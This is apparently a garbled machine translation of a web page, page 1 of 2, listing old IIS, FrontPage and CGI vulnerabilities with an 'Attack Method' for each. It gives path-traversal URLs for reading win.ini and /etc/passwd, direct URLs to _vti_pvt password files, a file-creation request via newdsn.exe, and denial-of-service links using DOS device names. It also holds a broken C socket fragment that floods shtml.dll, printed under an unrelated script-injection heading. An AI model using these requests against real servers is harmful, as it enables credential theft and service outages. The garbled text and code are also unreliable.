☆carbo.dll☆
ICAT Carbo Server A network shopping program, it was PC miscellaneous rated as the best online shopping software. Security experts Mikael Johansson found ICat carbo Server version 3.0.0. There is a vulnerability in
This vulnerability allows each of us to view any file in the system (except files and some special characters).
Attack Method:
Submit such an HTTP request:
Http://host/carbo.dll?icatcommand=file_to_view&catalogname=catalog
HTTP will respond as follows:
[ICat carbo Server (ISAPI, release) Version 3.0.0 Release build 244]
Error: ( -1007) cannot open file ' C:\web\carbohome\file_to_view.htm '
View Win.ini File: C:\winnt\win.ini:
Http://host/carbo.dll?icatcommand=.. \.. \winnt\win.ini&catalogname=catalog
___________________________________________________________________________
☆uploader.exe☆
If you use NT as your webserver operating system, intruders can upload any file using Uploader.exe.
Attack Method: Http://host/cgi-win/uploader.exe
will take you to the upload page, the rest of the things I don't have to tell you? :)
___________________________________________________________________________
☆search97.vts☆
This file will allow the intruder to read any files that the httpd user can read in your system.
Attack Method: Http://www.xxx.com/search97.vts
? Hlnavigate=on&querytext=dcm
&serverkey=primary
&resulttemplate=.. /.. /.. /.. /.. /.. /.. /etc/passwd
&resultstyle=simple
&resultcount=20
&collection=books
___________________________________________________________________________
☆newdsn.exe☆
A newdsn.exe file that exists in the/scripts/tools directory allows any user to create any file under the Web root directory. In addition, under certain specific conditions,
Using Newdsn.exe can cause IIS to be subjected to a denial-of-service attack, which, if successful, causes IIS to stop responding to connection requests.
Attack Method:
1. Create file: http://xxx.xxx.xxx.xxx/scripts/tools/newdsn.exe?driver=Microsoft+Access+Driver+ (*.mdb) &dsn=evil2+ Samples+from+microsoft&dbq=.. /.. /evil2.htm&newdb=create_db&attr=
2. D.O.s attack: Submit the following connection request:
Http://www.example.com/Scripts/Tools/Newdsn.exe?Createdatabase
If IIS is a problematic version, the browser will not display any information. When either of the following two cases occurs, a denial of service is caused:
-When you restart the WWW service: This causes IIS to suspend. The WWW service cannot be restarted and always displays the "Port is already occupied" error message.
-Stop the WWW service: IIS will stop. However, the database portion of IIS is not dead and still responds to requests from Port 80, so
If you submit a request again: Http://www.example.com/Scripts/Tools/Newdsn.exe?Createdatabase
IIS can produce protective errors.
___________________________________________________________________________
☆service.pwd☆
Http://www.hostname.com/_vti_pvt/service.pwd can be read, exposing user password information.
Attack Method:
Access to Http://host/_vti_pvt/service.pwd [SERVICE.PWD] is the required password file, if our careless network management does not set permissions, then the browser will display the other side of the password file.
___________________________________________________________________________
☆users.pwd☆
The UNIX system is http://www.hostname.com/_vti_pvt/users.pwd readable, exposing user password information.
Attack Method:
Access to HTTP://WWW.HOSTNAME.COM/_VTI_PVT/USERS.PWD.
___________________________________________________________________________
☆authors.pwd☆
The UNIX system is http://www.hostname.com/_vti_pvt/authors.pwd readable, exposing user password information.
Attack Method:
Access to HTTP://WWW.HOSTNAME.COM/_VTI_PVT/AUTHORS.PWD.
___________________________________________________________________________
☆administrators.pwd☆
The UNIX system is http://www.hostname.com/_vti_pvt/administrators.pwd readable, exposing user password information.
Attack Method:
Access to HTTP://WWW.HOSTNAME.COM/_VTI_PVT/ADMINISTRATORS.PWD.
___________________________________________________________________________
☆shtml.dll☆
Entering a nonexistent file on the FrontPage extention server/windows2000 Server will allow you to get local path information for the Web directory.
But if we ask for files that are not HTML, shtml or ASP suffixes, we will get different information. Http://TrustedServer If the user clicks
The specified link above, the script will be routed from the client to a trusted site via an HTTP request, trusted and then returned to the customer as part of the error message
Household end. When the client receives an error page that contains the script, it executes the script and assigns all the rights to the content from the trusted site. Other than that
Shtml.dll to the longer HTML suffix of the filename will be recognized and processed, using this, you can perform a Dos attack on the IIS server, the following program,
Enables the target server to have a CPU occupancy rate of 100% and consumes all the application log space. The system reports that the application log is full within a few minutes.
Attack Method:
1. Exposure Path: http://www.victim.com/_vti_bin/shtml.dll/something.html
This returns the following information:
Cannot open "d:\inetpub\wwwroot\postinfo1.html": No such file or folder.
2. Trusted Site Execution script: Use a URL in the following format:
Serv_addr.sin_family =af_inet;
SERV_ADDR.SIN_ADDR.S_ADDR = inet_addr ("192.168.0.131");
Serv_addr.sin_port = htons (80);
if ((sockfd =socket (af_inet,sock_stream,0)) <0)
{
printf ("Create Socket faild \ n");
return;
}
if (Connect (SOCKFD, (struct sockaddr*) &serv_addr,sizeof (serv_addr)) <0)
{
printf ("Connect faild \ n");;
}
Else
{
Llen = Send (Sockfd,plusvuln,strlen (PLUSVULN), 0);
for (lDo = 0; LDo < 7000;ldo + +)
{
Llen = Send (SOCKFD, "postinfdddddddddd", strlen ("postinfdddddddddd"), 0);
if (Llen < 0)
{
printf ("Send faild \ n");
Return
}
}
Llen = Send (SOCKFD, "tzl.html http/1.0\n\n", strlen ("tzl.html http/1.0\n\n") + 1,0);
Recv (sockfd,buffer,2000,0);
printf (buffer);
printf ("\ n");
}
Closesocket (SOCKFD);
}
___________________________________________________________________________
☆shtml.exe☆
Microsoft's FrontPage Server Extensions has a remote denial of service vulnerability that may remotely shut down all FrontPage operations on a Web site.
By submitting a link that contains a DOS device name, the FrontPage Server extensions hangs and no longer responds to subsequent requests. In order to return to normal work, you must restart IIS or reboot the machine.
Attack Method:
Submitting such a link may cause FrontPage Server extensions to stop responding: http://www.example.com/_vti_bin/shtml.exe/com1.htm http:// www.example.com/_vti_bin/shtml.exe/
Prn.htm http://www.example.com/_vti_bin/shtml.exe/aux.htm Http://www.example.com/_vti_bin/shtml.exe
/prn.anything.here.htm http://www.example.com/_vti_bin/shtml.exe/com1.asp Http://www.example.com/_
Vti_bin/shtml.exe/com1.
___________________________________________________________________________
☆queryhit.htm☆
If queryhit.htm a search page, then you can search and view the files.
Attack Method:
Access http://www.victim.com/samples/search/queryhit.htm If it is a search page, then enter the following string in the Find File dialog box:
[#filename =*.pwd], if a long string of strings attached to a password file with [. pwd] extension is displayed, that's what you need.
___________________________________________________________________________
☆dotdotdot☆
The Vqserver and Sybase PowerDynamo Web server has an old attack vulnerability that is about dot (..) The attack, which was due in window
Allows consecutive points to be interpreted as ' CD ... ', interpreted as ' CD ... '. \..'. While Sybase PowerDynamo, the old version of Vqserver allows remote attacks
Bypasses the Web security system and traverses to other directories.
Attack Method:
If Config.sys exists in the root directory, you can read the file. Http://example.com/...................../config.sys
Lists the root directory. http://example.com//... /.. /.. /.. /.. /.. /
___________________________________________________________________________
☆autoexec.bat☆
This security issue is present on many Web servers, such as Jana Webserver,url Live 1.0 Webserver. A malicious user could exploit the vulnerability to
Exits the HTTP root directory, which reaches the upper directory tree. Use the "..." in the URL. /, attackers can obtain any files that the Web server has permission to read.
Attack method:: 8080/. /.. /.. /autoexec.bat This will read the Autoexec.bat file in Wan
The exploitation of this vulnerability also depends on the structure of the system directory.
___________________________________________________________________________
☆ACHG.HTR aexp.htr aexp2.htr aexp2b.htr aexp3.htr aexp4.htraexp4b.htr anot.htr anot3.htr☆
An interesting feature of IIS4.0 is that it allows a remote user to attack a user account on a Web server, which means that your Web server converts addresses through NAT,
can also be attacked. Each IIS4.0 is installed with a virtual directory/iisadmpwd, which contains multiple. htr files that anonymous users are allowed to access,
These files happen to be limited to loopback addr (127.0.0.1), and requesting these files jumps out of the dialog box to allow you to modify the user's account and password via the web.
This directory is physically mapped in the following directory:
C:\winnt\system32\inetsrv\iisadmpwd
Attack Method:
Visit: http://example.com/iisadmpwd/*.htr pages and use tools to make them poor.
Current 1/2 page
12 Next read the full text
